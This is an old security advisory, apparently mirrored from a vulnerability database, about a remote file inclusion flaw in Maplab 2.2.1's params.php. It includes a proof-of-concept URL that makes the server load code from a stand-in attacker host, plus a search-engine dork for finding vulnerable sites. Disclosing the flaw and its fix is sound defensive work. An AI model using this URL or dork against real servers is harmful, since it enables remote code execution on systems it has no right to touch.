Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16548
HistoryApr 03, 2007 - 12:00 a.m.

Maplab <= 2.2.1 (gszAppPath) Remote File Inclusion Vulnerability

2007-04-0300:00:00
vulners.com
36

Maplab <= 2.2.1 (gszAppPath) Remote File Inclusion Vulnerability

Author : Mufti Rizal a.k.a mbahngarso
Date : March, 30th 2007
Location : Jakarta, Indonesia
Web : http://acak2an.blogspot.com
Critical Lvl : Dangerous
Impact : System access
Where : From Remote

Affected software description:


Application   : Maplab
version       : 2.2.1
Vendor        : http://maptools.org
Description :

A suite of web-based tools that simplifies the creation and management of MapServer maps and Web mapping applications

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~
- Invalid include function at gmapfactory/params.php  :  
        

/* =========================gmapfactory/params.php==========================
 * Re-build the phtml file
 * ========================================================================= */
include_once&#40;$gszAppPath.&quot;htdocs/gmapfactory/build_phtml.php&quot;&#41;;

...
----------------------------------------------------------------

Input passed to the &quot;gszAppPath&quot; parameter in params.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.




Poc/Exploit:
~~~~~~~~~
http://www.target.com/[maplab_path]/maplab/htdocs/gmapfactory/params.php?gszAppPath=http://attacker.com/setan?



google d0rk:
~~~~~~~
&quot;allinurl:/gmapfactory&quot; or &quot;allinurl:/maplab&quot;



Solution:
~~~~~~

- Edit the source code to ensure that input is properly verified.
- Turn off register_globals


---------------------------------------------------------------------------

Shoutz:
~~~~
~ K-159, the_day, etc
~ Underground Community.

---------------------------------------------------------------------------
Contact:
~~~~~
     mbahngarso ||  mufti.rizal@gmail.com
     Homepage : http://acak2an.blogspot.com
-------------------------------- [ EOF ] ----------------------------------